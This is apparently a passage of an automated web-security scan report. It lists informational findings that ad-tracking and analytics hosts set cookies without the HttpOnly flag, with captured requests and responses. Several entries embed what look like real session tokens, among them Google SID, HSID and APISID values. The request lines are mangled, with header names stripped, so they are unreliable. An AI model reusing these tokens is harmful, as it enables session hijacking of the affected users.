GET /pixel?id=427800&t=2 HTTP/1.1/domains/search.aspx;q=0.3-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#u!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246
Response
HTTP/1.1 200 OKSet-Cookie: bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!$=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Sun, 15-Sep-2013 18:08:28 GMT Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT ..,...........D..;
11.17. http://amch.questionmarket.com/adsc/d887846/17/909940/adscout.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adsc/d887846/17/909940/adscout.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:CS1=deleted; expires=Thu, 16 Sep 2010 16:24:53 GMT; path=/; domain=.questionmarket.com CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; expires=Tue, 06 Nov 2012 08:24:54 GMT; path=/; domain=.questionmarket.com ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0; expires=Tue, 06-Nov-2012 08:24:54 GMT; path=/; domain=.questionmarket.com;
Request
GET /adsc/d887846/17/909940/adscout.php HTTP/1.1/portal/tabs/?tab_name=News;q=0.35152932-9-1_600001512117-15-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0
Response
HTTP/1.1 200 OK.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"Set-Cookie: CS1=deleted; expires=Thu, 16 Sep 2010 16:24:53 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; expires=Tue, 06 Nov 2012 08:24:54 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0; expires=Tue, 06-Nov-2012 08:24:54 GMT; path=/; domain=.questionmarket.com; ..,...........D..;
11.18. http://amch.questionmarket.com/adsc/d922317/2/43977402/decide.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adsc/d922317/2/43977402/decide.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:CS1=deleted; expires=Thu, 16-Sep-2010 16:30:33 GMT; path=/; domain=.questionmarket.com CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-1; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com;
Request
GET /adsc/d922317/2/43977402/decide.php?ord=1316208680 HTTP/1.1/*;q=0.5;q=0.7-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1
Response
HTTP/1.1 200 OKnetServer/2.0.50.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"Set-Cookie: CS1=deleted; expires=Thu, 16-Sep-2010 16:30:33 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-1; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com; ..,...........D..;
11.19. http://apis.google.com/js/plusone.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://apis.google.com
Path:
/js/plusone.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4;Domain=.google.com;Path=/;Expires=Mon, 13-Sep-2021 17:54:35 GMT
Request
GET /js/plusone.js HTTP/1.1;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 200 OKSet-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4;Domain=.google.com;Path=/;Expires=Mon, 13-Sep-2021 17:54:35 GMT /support/accounts/bin/answer.py?hl=en&answer=151657 for more info."_jsl||{};_jsl.h||'r;gc\/23803279-4555db52';=window.__GOOGLEAPIS||{};.gwidget=window.__GOOGL...[SNIP]...
11.20. http://b.scorecardresearch.com/b
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/b
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 15:29:21 GMT; path=/; domain=.scorecardresearch.com
Request
GET /b?c1=7&c2=8097938&rn=1687656345&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.blackbaud.com%252F%26jsref%3D%26rnd%3D1316204996203&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.blackbaud.com%2F&cv=2.2&cs=js HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3-1314793633
Response
HTTP/1.1 204 No ContentSet-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 15:29:21 GMT; path=/; domain=.scorecardresearch.com
11.21. http://bstats.adbrite.com/click/bstats.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://bstats.adbrite.com
Path:
/click/bstats.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ut="1%3AHcxBCoAgEEDRu8y6RQZJeBsrjTQdtbDC6e6V28%2FjF8gdiAJW3SemeQcBCXmbiZ3DoA0xapsQjgOJZc3DUkNSceuJXShdpO4X3tz6E1Ow7hfQwCi9V2mtR3ieFw%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:30:26 GMT vsd=0@2@4e7379a2@www.drugstore.com; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:30:26 GMT
Request
GET /click/bstats.gif?kid=46037273&bapid=7622&uid=740987 HTTP/1.1/*;q=0.5;q=0.7+1312290886x-1235322650"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirKNzMoqzEst7BIy6oxrDHQKSgoKcmvMSxLMytIhwjkZVWmAQWSC7JzQQJKOkpJiXl5qUWZYAOUamsB"; rb2=ChwKBjcxMjE1NhiVssXtMSIMZ2w5OWloMGoweHFuCjwKBjcxMjE4MRip_KKIMiIsV1g5cVpWZDJUWFZFQm1OZUFRWnlYQUpRYVhzUWRBRkJERmxwVlZGT1lBPT0KIwoGNzQyNjk3GPfN-pYuIhM5MDMzNDQyMzIwOTE2MDg3NjM0EAE; rb="0:712156:20838240:gl99ih0j0xqn:0:712181:20838240:WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==:0:742697:20828160:9033442320916087634:0"
Response
HTTP/1.1 200 OKSet-Cookie: ut="1%3AHcxBCoAgEEDRu8y6RQZJeBsrjTQdtbDC6e6V28%2FjF8gdiAJW3SemeQcBCXmbiZ3DoA0xapsQjgOJZc3DUkNSceuJXShdpO4X3tz6E1Ow7hfQwCi9V2mtR3ieFw%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:30:26 GMT Set-Cookie: vsd=0@2@4e7379a2@www.drugstore.com; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:30:26 GMT .adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"..,........@..D.;
11.22. http://d.adroll.com/check/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH/NQ5TTRI2MVGQHFZLQL6SMW
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/check/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH/NQ5TTRI2MVGQHFZLQL6SMW
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Request
GET /check/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH/NQ5TTRI2MVGQHFZLQL6SMW HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.32491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ /blank.gif
11.23. http://d.adroll.com/pixel/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/pixel/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Request
GET /pixel/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH?pv=13318588747.642935&cookie=&keyw=smtp+server HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.32491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ /4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH/NQ5TTRI2MVGQHFZLQL6SMW.js
11.24. http://drugstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://drugstore.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:STICKY=SEAWEB013P:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ BIGipServerdscm_farm=1897179328.0.0000; expires=Fri, 16-Sep-2011 17:30:22 GMT; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7
Response
HTTP/1.1 301 Moved PermanentlySet-Cookie: STICKY=SEAWEB013P:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ Set-Cookie: BIGipServerdscm_farm=1897179328.0.0000; expires=Fri, 16-Sep-2011 17:30:22 GMT; path=/
11.25. http://go.icontact.com/SEM/AP
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
GET /SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]...
11.26. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/free-30-day-trial-20J6-1725H4.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
GET /SEM/AP/free-30-day-trial-20J6-1725H4.html HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578
Response
HTTP/1.1 200 OKSet-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]...
11.27. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/home-20J6-17231V.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
POST /SEM/AP/home-20J6-17231V.html?rid=1286578&rky=LBG7YTE7&tky=129606603206814841 HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757UKMTIzNjIzMDUzNmRk&experience_level=New&ctl26=+++Next+Step++
Response
HTTP/1.1 302 Found=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=1286578&rky=LBG7YTE7&tky=129606603518212652Set-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ >=20&sky=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=12865...[SNIP]...
11.28. http://ib.mookie1.com/image.sbix
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ib.mookie1.com
Path:
/image.sbix
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ibkukinet=840399722=-8588854161174900426; path=/
Request
